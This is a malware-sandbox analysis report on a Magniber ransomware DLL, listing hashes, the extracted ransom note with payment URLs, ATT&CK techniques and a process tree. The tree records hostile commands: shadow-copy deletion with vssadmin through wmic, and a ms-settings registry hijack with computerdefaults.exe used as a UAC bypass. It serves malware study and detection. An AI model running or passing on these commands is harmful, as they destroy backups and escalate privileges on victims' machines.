magniber | 9209b297a4d3af1a82e4a60fa45fa558f08a502ebcf5dc2fa487505fd72be331

Analysis

max time kernel
160s
max time network
175s
platform
windows10-2004_x64
resource
win10v2004-20231215-en
resource tags

arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
submitted
31-12-2023 09:17

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

3088d9d808dd030a756633437f351b13.dll
Size

33KB
MD5

3088d9d808dd030a756633437f351b13
SHA1

a4e78428c7aa5f14681a313fd3f92c9267e9469a
SHA256

9209b297a4d3af1a82e4a60fa45fa558f08a502ebcf5dc2fa487505fd72be331
SHA512

2db4cc645b040f5e5e73d61db8342b40b5fd592ad96b5187d8513e5fd6864da6306ebc887b58df7ebf94f00aac703a3acfe30e326bd9bf7eec49a27276d75b70
SSDEEP

768:JxnHytUcpkucln36De22PJNFai4OLS5wz3YKUt4fSsDZ:J0DkVV6Dh2dHrdzrbNZ

Score

10^/10

magniber ransomware

Malware Config

Extracted

Path

C:\Users\Admin\Pictures\readme.txt

Family

magniber

Ransom Note

ALL YOUR DOCUMENTS PHOTOS DATABASES AND OTHER IMPORTANT FILES HAVE BEEN ENCRYPTED! ==================================================================================================== Your files are NOT damaged! Your files are modified only. This modification is reversible. The only 1 way to decrypt your files is to receive the private key and decryption program. Any attempts to restore your files with the third party software will be fatal for your files! ==================================================================================================== To receive the private key and decryption program follow the instructions below: 1. Download "Tor Browser" from https://www.torproject.org/ and install it. 2. In the "Tor Browser" open your personal page here: http://2898fa80668c10504emkyhecy.yeipgu36oui5z4yvck5w6d252oo3h7ktcsxvs3m2wac6ezmti2iotzad.onion/emkyhecy Note! This page is available via "Tor Browser" only. ==================================================================================================== Also you can use temporary addresses on your personal page without using "Tor Browser": http://2898fa80668c10504emkyhecy.mixedon.xyz/emkyhecy http://2898fa80668c10504emkyhecy.actmake.site/emkyhecy http://2898fa80668c10504emkyhecy.spiteor.space/emkyhecy http://2898fa80668c10504emkyhecy.bearsat.space/emkyhecy Note! These are temporary addresses! They will be available for a limited amount of time!

URLs

http://2898fa80668c10504emkyhecy.yeipgu36oui5z4yvck5w6d252oo3h7ktcsxvs3m2wac6ezmti2iotzad.onion/emkyhecy

http://2898fa80668c10504emkyhecy.mixedon.xyz/emkyhecy

http://2898fa80668c10504emkyhecy.actmake.site/emkyhecy

http://2898fa80668c10504emkyhecy.spiteor.space/emkyhecy

http://2898fa80668c10504emkyhecy.bearsat.space/emkyhecy

Signatures

Detect magniber ransomware 1 IoCs

Processes:

resource	yara_rule
behavioral2/memory/4636-0-0x0000022E7DB30000-0x0000022E7E475000-memory.dmp	family_magniber

Magniber Ransomware
Ransomware family widely seen in Asia being distributed by the Magnitude exploit kit.
ransomware magniber

Process spawned unexpected child process 5 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

cmd.execmd.exevssadmin.exevssadmin.exevssadmin.exe

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	752	3092	cmd.exe	89
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1984	3092	cmd.exe	89
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4628	3092	vssadmin.exe	89
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4676	3092	vssadmin.exe	89
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1168	3092	vssadmin.exe	89

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1070.004

Inhibit System Recovery
T1490
Renames multiple (74) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
ransomware
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

msedge.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Interacts with shadow copies 2 TTPs 3 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1070.004

Inhibit System Recovery

T1490

Processes:

vssadmin.exevssadmin.exevssadmin.exe

pid	Process
4676	vssadmin.exe
1168	vssadmin.exe
4628	vssadmin.exe

Modifies registry class 7 IoCs

Processes:

rundll32.exe

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-996941297-2279405024-2328152752-1000_Classes\ms-settings\shell\open\command	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-996941297-2279405024-2328152752-1000_Classes\ms-settings	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-996941297-2279405024-2328152752-1000_Classes\ms-settings\shell	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-996941297-2279405024-2328152752-1000_Classes\ms-settings\shell\open	rundll32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-996941297-2279405024-2328152752-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt"	rundll32.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-996941297-2279405024-2328152752-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0"	rundll32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-996941297-2279405024-2328152752-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	rundll32.exe

Opens file in notepad (likely ransom note) 1 IoCs

ransomware

Processes:

notepad.exe

pid	Process
3268	notepad.exe

Suspicious behavior: EnumeratesProcesses 10 IoCs

Processes:

msedge.exemsedge.exeidentity_helper.exemsedge.exe

pid	Process
4720	msedge.exe
4720	msedge.exe
4396	msedge.exe
4396	msedge.exe
5208	identity_helper.exe
5208	identity_helper.exe
3504	msedge.exe
3504	msedge.exe
3504	msedge.exe
3504	msedge.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 10 IoCs

Processes:

msedge.exe

pid	Process
4396	msedge.exe
4396	msedge.exe
4396	msedge.exe
4396	msedge.exe
4396	msedge.exe
4396	msedge.exe
4396	msedge.exe
4396	msedge.exe
4396	msedge.exe
4396	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

wmic.exemsedge.exemsedge.exe

description	pid	Process
Token: SeIncreaseQuotaPrivilege	3292	wmic.exe
Token: SeSecurityPrivilege	3292	wmic.exe
Token: SeTakeOwnershipPrivilege	3292	wmic.exe
Token: SeLoadDriverPrivilege	3292	wmic.exe
Token: SeSystemProfilePrivilege	3292	wmic.exe
Token: SeSystemtimePrivilege	3292	wmic.exe
Token: SeProfSingleProcessPrivilege	3292	wmic.exe
Token: SeIncBasePriorityPrivilege	3292	wmic.exe
Token: SeCreatePagefilePrivilege	3292	wmic.exe
Token: SeBackupPrivilege	3292	wmic.exe
Token: SeRestorePrivilege	3292	wmic.exe
Token: SeShutdownPrivilege	3292	wmic.exe
Token: SeDebugPrivilege	3292	wmic.exe
Token: SeSystemEnvironmentPrivilege	3292	wmic.exe
Token: SeRemoteShutdownPrivilege	3292	wmic.exe
Token: SeUndockPrivilege	3292	wmic.exe
Token: SeManageVolumePrivilege	3292	wmic.exe
Token: 33	3292	wmic.exe
Token: 34	3292	wmic.exe
Token: 35	3292	wmic.exe
Token: 36	3292	wmic.exe
Token: SeIncreaseQuotaPrivilege	4720	msedge.exe
Token: SeSecurityPrivilege	4720	msedge.exe
Token: SeTakeOwnershipPrivilege	4720	msedge.exe
Token: SeLoadDriverPrivilege	4720	msedge.exe
Token: SeSystemProfilePrivilege	4720	msedge.exe
Token: SeSystemtimePrivilege	4720	msedge.exe
Token: SeProfSingleProcessPrivilege	4720	msedge.exe
Token: SeIncBasePriorityPrivilege	4720	msedge.exe
Token: SeCreatePagefilePrivilege	4720	msedge.exe
Token: SeBackupPrivilege	4720	msedge.exe
Token: SeRestorePrivilege	4720	msedge.exe
Token: SeShutdownPrivilege	4720	msedge.exe
Token: SeDebugPrivilege	4720	msedge.exe
Token: SeSystemEnvironmentPrivilege	4720	msedge.exe
Token: SeRemoteShutdownPrivilege	4720	msedge.exe
Token: SeUndockPrivilege	4720	msedge.exe
Token: SeManageVolumePrivilege	4720	msedge.exe
Token: 33	4720	msedge.exe
Token: 34	4720	msedge.exe
Token: 35	4720	msedge.exe
Token: 36	4720	msedge.exe
Token: SeIncreaseQuotaPrivilege	1444	msedge.exe
Token: SeSecurityPrivilege	1444	msedge.exe
Token: SeTakeOwnershipPrivilege	1444	msedge.exe
Token: SeLoadDriverPrivilege	1444	msedge.exe
Token: SeSystemProfilePrivilege	1444	msedge.exe
Token: SeSystemtimePrivilege	1444	msedge.exe
Token: SeProfSingleProcessPrivilege	1444	msedge.exe
Token: SeIncBasePriorityPrivilege	1444	msedge.exe
Token: SeCreatePagefilePrivilege	1444	msedge.exe
Token: SeBackupPrivilege	1444	msedge.exe
Token: SeRestorePrivilege	1444	msedge.exe
Token: SeShutdownPrivilege	1444	msedge.exe
Token: SeDebugPrivilege	1444	msedge.exe
Token: SeSystemEnvironmentPrivilege	1444	msedge.exe
Token: SeRemoteShutdownPrivilege	1444	msedge.exe
Token: SeUndockPrivilege	1444	msedge.exe
Token: SeManageVolumePrivilege	1444	msedge.exe
Token: 33	1444	msedge.exe
Token: 34	1444	msedge.exe
Token: 35	1444	msedge.exe
Token: 36	1444	msedge.exe
Token: SeIncreaseQuotaPrivilege	3292	wmic.exe

Suspicious use of FindShellTrayWindow 25 IoCs

Processes:

msedge.exe

pid	Process
4396	msedge.exe
4396	msedge.exe
4396	msedge.exe
4396	msedge.exe
4396	msedge.exe
4396	msedge.exe
4396	msedge.exe
4396	msedge.exe
4396	msedge.exe
4396	msedge.exe
4396	msedge.exe
4396	msedge.exe
4396	msedge.exe
4396	msedge.exe
4396	msedge.exe
4396	msedge.exe
4396	msedge.exe
4396	msedge.exe
4396	msedge.exe
4396	msedge.exe
4396	msedge.exe
4396	msedge.exe
4396	msedge.exe
4396	msedge.exe
4396	msedge.exe

Suspicious use of SendNotifyMessage 24 IoCs

Processes:

msedge.exe

pid	Process
4396	msedge.exe
4396	msedge.exe
4396	msedge.exe
4396	msedge.exe
4396	msedge.exe
4396	msedge.exe
4396	msedge.exe
4396	msedge.exe
4396	msedge.exe
4396	msedge.exe
4396	msedge.exe
4396	msedge.exe
4396	msedge.exe
4396	msedge.exe
4396	msedge.exe
4396	msedge.exe
4396	msedge.exe
4396	msedge.exe
4396	msedge.exe
4396	msedge.exe
4396	msedge.exe
4396	msedge.exe
4396	msedge.exe
4396	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

rundll32.execmd.execmd.execmd.execmd.execmd.exeComputerDefaults.exeComputerDefaults.exemsedge.exe

description	pid	Process	procid_target
PID 4636 wrote to memory of 3268	4636	rundll32.exe	43
PID 4636 wrote to memory of 3268	4636	rundll32.exe	43
PID 4636 wrote to memory of 208	4636	rundll32.exe	66
PID 4636 wrote to memory of 208	4636	rundll32.exe	66
PID 4636 wrote to memory of 3292	4636	rundll32.exe	65
PID 4636 wrote to memory of 3292	4636	rundll32.exe	65
PID 4636 wrote to memory of 3644	4636	rundll32.exe	64
PID 4636 wrote to memory of 3644	4636	rundll32.exe	64
PID 4636 wrote to memory of 4512	4636	rundll32.exe	59
PID 4636 wrote to memory of 4512	4636	rundll32.exe	59
PID 3644 wrote to memory of 4720	3644	cmd.exe	126
PID 3644 wrote to memory of 4720	3644	cmd.exe	126
PID 4512 wrote to memory of 1444	4512	cmd.exe	125
PID 4512 wrote to memory of 1444	4512	cmd.exe	125
PID 752 wrote to memory of 3516	752	cmd.exe	99
PID 752 wrote to memory of 3516	752	cmd.exe	99
PID 1984 wrote to memory of 4580	1984	cmd.exe	100
PID 1984 wrote to memory of 4580	1984	cmd.exe	100
PID 208 wrote to memory of 4396	208	cmd.exe	104
PID 208 wrote to memory of 4396	208	cmd.exe	104
PID 3516 wrote to memory of 4452	3516	ComputerDefaults.exe	109
PID 3516 wrote to memory of 4452	3516	ComputerDefaults.exe	109
PID 4580 wrote to memory of 3148	4580	ComputerDefaults.exe	112
PID 4580 wrote to memory of 3148	4580	ComputerDefaults.exe	112
PID 4396 wrote to memory of 2840	4396	msedge.exe	110
PID 4396 wrote to memory of 2840	4396	msedge.exe	110
PID 4396 wrote to memory of 1444	4396	msedge.exe	125
PID 4396 wrote to memory of 1444	4396	msedge.exe	125
PID 4396 wrote to memory of 1444	4396	msedge.exe	125
PID 4396 wrote to memory of 1444	4396	msedge.exe	125
PID 4396 wrote to memory of 1444	4396	msedge.exe	125
PID 4396 wrote to memory of 1444	4396	msedge.exe	125
PID 4396 wrote to memory of 1444	4396	msedge.exe	125
PID 4396 wrote to memory of 1444	4396	msedge.exe	125
PID 4396 wrote to memory of 1444	4396	msedge.exe	125
PID 4396 wrote to memory of 1444	4396	msedge.exe	125
PID 4396 wrote to memory of 1444	4396	msedge.exe	125
PID 4396 wrote to memory of 1444	4396	msedge.exe	125
PID 4396 wrote to memory of 1444	4396	msedge.exe	125
PID 4396 wrote to memory of 1444	4396	msedge.exe	125
PID 4396 wrote to memory of 1444	4396	msedge.exe	125
PID 4396 wrote to memory of 1444	4396	msedge.exe	125
PID 4396 wrote to memory of 1444	4396	msedge.exe	125
PID 4396 wrote to memory of 1444	4396	msedge.exe	125
PID 4396 wrote to memory of 1444	4396	msedge.exe	125
PID 4396 wrote to memory of 1444	4396	msedge.exe	125
PID 4396 wrote to memory of 1444	4396	msedge.exe	125
PID 4396 wrote to memory of 1444	4396	msedge.exe	125
PID 4396 wrote to memory of 1444	4396	msedge.exe	125
PID 4396 wrote to memory of 1444	4396	msedge.exe	125
PID 4396 wrote to memory of 1444	4396	msedge.exe	125
PID 4396 wrote to memory of 1444	4396	msedge.exe	125
PID 4396 wrote to memory of 1444	4396	msedge.exe	125
PID 4396 wrote to memory of 1444	4396	msedge.exe	125
PID 4396 wrote to memory of 1444	4396	msedge.exe	125
PID 4396 wrote to memory of 1444	4396	msedge.exe	125
PID 4396 wrote to memory of 1444	4396	msedge.exe	125
PID 4396 wrote to memory of 1444	4396	msedge.exe	125
PID 4396 wrote to memory of 1444	4396	msedge.exe	125
PID 4396 wrote to memory of 1444	4396	msedge.exe	125
PID 4396 wrote to memory of 1444	4396	msedge.exe	125
PID 4396 wrote to memory of 1444	4396	msedge.exe	125
PID 4396 wrote to memory of 1444	4396	msedge.exe	125
PID 4396 wrote to memory of 1444	4396	msedge.exe	125

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\3088d9d808dd030a756633437f351b13.dll,#1
1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:4636
- C:\Windows\system32\notepad.exe
  notepad.exe C:\Users\Public\readme.txt
  2⤵
  - Opens file in notepad (likely ransom note)
  PID:3268
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4512
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:1444
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3644
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:4720
- C:\Windows\system32\wbem\wmic.exe
  C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3292
- C:\Windows\system32\cmd.exe
  cmd /c "start http://2898fa80668c10504emkyhecy.mixedon.xyz/emkyhecy^&2^&26012594^&74^&335^&2219041"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:208
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://2898fa80668c10504emkyhecy.mixedon.xyz/emkyhecy&2&26012594&74&335&2219041
    3⤵
    - Enumerates system info in registry
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    - Suspicious use of WriteProcessMemory
    PID:4396
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffc9dc846f8,0x7ffc9dc84708,0x7ffc9dc84718
      4⤵
      PID:2840
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2088,7444993308875058614,14177142746447730470,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2104 /prefetch:2
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1444
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2088,7444993308875058614,14177142746447730470,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2180 /prefetch:3
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4720
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2088,7444993308875058614,14177142746447730470,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2924 /prefetch:8
      4⤵
      PID:1548
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,7444993308875058614,14177142746447730470,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2092 /prefetch:1
      4⤵
      PID:1632
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,7444993308875058614,14177142746447730470,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3340 /prefetch:1
      4⤵
      PID:3680
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,7444993308875058614,14177142746447730470,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4108 /prefetch:1
      4⤵
      PID:5008
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,7444993308875058614,14177142746447730470,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4292 /prefetch:1
      4⤵
      PID:3836
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,7444993308875058614,14177142746447730470,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5160 /prefetch:1
      4⤵
      PID:1360
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,7444993308875058614,14177142746447730470,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4132 /prefetch:1
      4⤵
      PID:4312
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,7444993308875058614,14177142746447730470,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5324 /prefetch:1
      4⤵
      PID:1168
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,7444993308875058614,14177142746447730470,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5384 /prefetch:1
      4⤵
      PID:4172
  - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2088,7444993308875058614,14177142746447730470,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5924 /prefetch:8
      4⤵
      PID:5192
  - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2088,7444993308875058614,14177142746447730470,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5924 /prefetch:8
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:5208
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,7444993308875058614,14177142746447730470,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5628 /prefetch:1
      4⤵
      PID:5828
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,7444993308875058614,14177142746447730470,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4272 /prefetch:1
      4⤵
      PID:5940
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2088,7444993308875058614,14177142746447730470,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5380 /prefetch:2
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:3504

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:752
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3516
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:4452

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:1984
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4580
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:3148

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:4628

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:220

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:4676

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:1168

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5068

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1472

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Indicator Removal

T1070

File Deletion

T1070.004

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
eb20b5930f48aa090358398afb25b683

SHA1
4892c8b72aa16c5b3f1b72811bf32b89f2d13392

SHA256
2695ab23c2b43aa257f44b6943b6a56b395ea77dc24e5a9bd16acc2578168a35

SHA512
d0c6012a0059bc1bb49b2f293e6c07019153e0faf833961f646a85b992b47896092f33fdccc893334c79f452218d1542e339ded3f1b69bd8e343d232e6c3d9e8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
111B

MD5
285252a2f6327d41eab203dc2f402c67

SHA1
acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6

SHA256
5dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026

SHA512
11ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
587b3b610cd1eb2c114c296c12ab0475

SHA1
92628b370eade5cd4f0c4920b5ddbd481df41d3a

SHA256
98dabbdfbe08ea885be36aa31a9684ca65a65a219a6261065e5e712700142af7

SHA512
b6e54daa12969769831a7a9fe9a5ccd682b986c2b4236f2d5bd59c5544bc2243d26c8d53e551ac6a66fcdcbc46fe9f703a6ada66c3dadcad00fdcf6ebdfa4f61

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
4b1ca17dc7b5390de577a70c3d941e20

SHA1
